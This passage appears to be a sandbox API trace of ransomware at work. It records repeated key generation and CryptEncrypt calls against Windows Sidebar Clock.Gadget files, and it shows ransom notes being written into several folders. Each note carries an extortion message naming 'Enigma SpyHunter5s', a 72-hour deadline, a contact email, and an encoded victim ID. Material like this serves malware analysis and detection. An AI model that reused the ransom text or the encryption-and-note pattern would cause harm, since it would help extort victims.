pbData=0x31f278*, pdwDataLen=0x270e840*=0x30) returned 1 [0161.845] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_m.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_m.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.853] GetProcessHeap () returned 0x2c0000 [0161.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.853] GetProcessHeap () returned 0x2c0000 [0161.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed0bd0 | out: hHeap=0x2c0000) returned 1 [0161.853] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e848 | out: pbBuffer=0x270e848) returned 1 [0161.853] GetProcessHeap () returned 0x2c0000 [0161.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.854] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e840*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e840*=0x30) returned 1 [0161.854] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.855] GetProcessHeap () returned 0x2c0000 [0161.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.855] GetProcessHeap () returned 0x2c0000 [0161.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed09f0 | out: hHeap=0x2c0000) returned 1 [0161.856] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e840 | out: pbBuffer=0x270e840) returned 1 [0161.856] GetProcessHeap () returned 0x2c0000 [0161.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.856] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e838*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e838*=0x30) returned 1 [0161.856] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_s.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_s.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.858] GetProcessHeap () returned 0x2c0000 [0161.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.858] GetProcessHeap () returned 0x2c0000 [0161.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed0900 | out: hHeap=0x2c0000) returned 1 [0161.858] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e840 | out: pbBuffer=0x270e840) returned 1 [0161.858] GetProcessHeap () returned 0x2c0000 [0161.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.858] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e838*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e838*=0x30) returned 1 [0161.858] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_h.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_h.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.860] GetProcessHeap () returned 0x2c0000 [0161.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.860] GetProcessHeap () returned 0x2c0000 [0161.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed0720 | out: hHeap=0x2c0000) returned 1 [0161.860] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e838 | out: pbBuffer=0x270e838) returned 1 [0161.860] GetProcessHeap () returned 0x2c0000 [0161.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.860] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e830*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e830*=0x30) returned 1 [0161.860] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.862] GetProcessHeap () returned 0x2c0000 [0161.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.862] GetProcessHeap () returned 0x2c0000 [0161.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed0630 | out: hHeap=0x2c0000) returned 1 [0161.862] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e838 | out: pbBuffer=0x270e838) returned 1 [0161.862] GetProcessHeap () returned 0x2c0000 [0161.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.863] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e830*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e830*=0x30) returned 1 [0161.863] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_s.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_s.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.864] GetProcessHeap () returned 0x2c0000 [0161.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.864] GetProcessHeap () returned 0x2c0000 [0161.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed0540 | out: hHeap=0x2c0000) returned 1 [0161.865] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e830 | out: pbBuffer=0x270e830) returned 1 [0161.865] GetProcessHeap () returned 0x2c0000 [0161.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.865] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e828*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e828*=0x30) returned 1 [0161.865] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_h.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_h.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.867] GetProcessHeap () returned 0x2c0000 [0161.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.867] GetProcessHeap () returned 0x2c0000 [0161.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed0360 | out: hHeap=0x2c0000) returned 1 [0161.867] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e830 | out: pbBuffer=0x270e830) returned 1 [0161.867] GetProcessHeap () returned 0x2c0000 [0161.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.867] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e828*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e828*=0x30) returned 1 [0161.867] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.871] GetProcessHeap () returned 0x2c0000 [0161.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.871] GetProcessHeap () returned 0x2c0000 [0161.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed0270 | out: hHeap=0x2c0000) returned 1 [0161.872] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e828 | out: pbBuffer=0x270e828) returned 1 [0161.872] GetProcessHeap () returned 0x2c0000 [0161.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.872] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e820*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e820*=0x30) returned 1 [0161.872] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_h.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.873] GetProcessHeap () returned 0x2c0000 [0161.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.873] GetProcessHeap () returned 0x2c0000 [0161.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c86798 | out: hHeap=0x2c0000) returned 1 [0161.873] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e828 | out: pbBuffer=0x270e828) returned 1 [0161.873] GetProcessHeap () returned 0x2c0000 [0161.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.873] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e820*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e820*=0x30) returned 1 [0161.873] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.873] GetProcessHeap () returned 0x2c0000 [0161.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.873] GetProcessHeap () returned 0x2c0000 [0161.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaf1b8 | out: hHeap=0x2c0000) returned 1 [0161.873] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e820 | out: pbBuffer=0x270e820) returned 1 [0161.873] GetProcessHeap () returned 0x2c0000 [0161.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.873] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e818*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e818*=0x30) returned 1 [0161.874] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.874] GetProcessHeap () returned 0x2c0000 [0161.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.874] GetProcessHeap () returned 0x2c0000 [0161.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c866a0 | out: hHeap=0x2c0000) returned 1 [0161.875] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e820 | out: pbBuffer=0x270e820) returned 1 [0161.875] GetProcessHeap () returned 0x2c0000 [0161.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.875] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e818*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e818*=0x30) returned 1 [0161.875] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\icon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.875] GetProcessHeap () returned 0x2c0000 [0161.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.875] GetProcessHeap () returned 0x2c0000 [0161.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb28d8 | out: hHeap=0x2c0000) returned 1 [0161.876] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.887] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.887] WriteFile (in: hFile=0x178, lpBuffer=0x270e74f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e878, lpOverlapped=0x0 | out: lpBuffer=0x270e74f*, lpNumberOfBytesWritten=0x270e878*=0x127, lpOverlapped=0x0) returned 1 [0161.888] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.888] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e878, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e878*=0x2ac, lpOverlapped=0x0) returned 1 [0161.888] CloseHandle (hObject=0x178) returned 1 [0161.888] GetProcessHeap () returned 0x2c0000 [0161.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c865a8 | out: hHeap=0x2c0000) returned 1 [0161.888] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e818 | out: pbBuffer=0x270e818) returned 1 [0161.889] GetProcessHeap () returned 0x2c0000 [0161.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.889] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e810*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e810*=0x30) returned 1 [0161.889] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\settings.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\settings.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.890] GetProcessHeap () returned 0x2c0000 [0161.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.890] GetProcessHeap () returned 0x2c0000 [0161.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c863b8 | out: hHeap=0x2c0000) returned 1 [0161.890] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e810 | out: pbBuffer=0x270e810) returned 1 [0161.890] GetProcessHeap () returned 0x2c0000 [0161.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.890] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e808*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e808*=0x30) returned 1 [0161.890] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\gadget.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.891] GetProcessHeap () returned 0x2c0000 [0161.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.891] GetProcessHeap () returned 0x2c0000 [0161.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecffa0 | out: hHeap=0x2c0000) returned 1 [0161.891] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\css\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.892] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.892] WriteFile (in: hFile=0x178, lpBuffer=0x270e743*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e86c, lpOverlapped=0x0 | out: lpBuffer=0x270e743*, lpNumberOfBytesWritten=0x270e86c*=0x127, lpOverlapped=0x0) returned 1 [0161.893] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.893] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e86c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e86c*=0x2ac, lpOverlapped=0x0) returned 1 [0161.893] CloseHandle (hObject=0x178) returned 1 [0161.893] GetProcessHeap () returned 0x2c0000 [0161.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaefb8 | out: hHeap=0x2c0000) returned 1 [0161.893] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e808 | out: pbBuffer=0x270e808) returned 1 [0161.893] GetProcessHeap () returned 0x2c0000 [0161.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.893] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e800*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e800*=0x30) returned 1 [0161.893] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\settings.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\css\\settings.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.894] GetProcessHeap () returned 0x2c0000 [0161.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.894] GetProcessHeap () returned 0x2c0000 [0161.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c862c0 | out: hHeap=0x2c0000) returned 1 [0161.894] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e808 | out: pbBuffer=0x270e808) returned 1 [0161.894] GetProcessHeap () returned 0x2c0000 [0161.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.895] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e800*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e800*=0x30) returned 1 [0161.895] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\clock.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\css\\clock.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.895] GetProcessHeap () returned 0x2c0000 [0161.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.895] GetProcessHeap () returned 0x2c0000 [0161.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecfeb0 | out: hHeap=0x2c0000) returned 1 [0161.895] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e800 | out: pbBuffer=0x270e800) returned 1 [0161.895] GetProcessHeap () returned 0x2c0000 [0161.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.895] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e7f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e7f8*=0x30) returned 1 [0161.895] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\clock.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.895] GetProcessHeap () returned 0x2c0000 [0161.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.895] GetProcessHeap () returned 0x2c0000 [0161.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecfdc0 | out: hHeap=0x2c0000) returned 1 [0161.896] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e800 | out: pbBuffer=0x270e800) returned 1 [0161.896] GetProcessHeap () returned 0x2c0000 [0161.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.896] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e7f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e7f8*=0x30) returned 1 [0161.896] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\drag.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 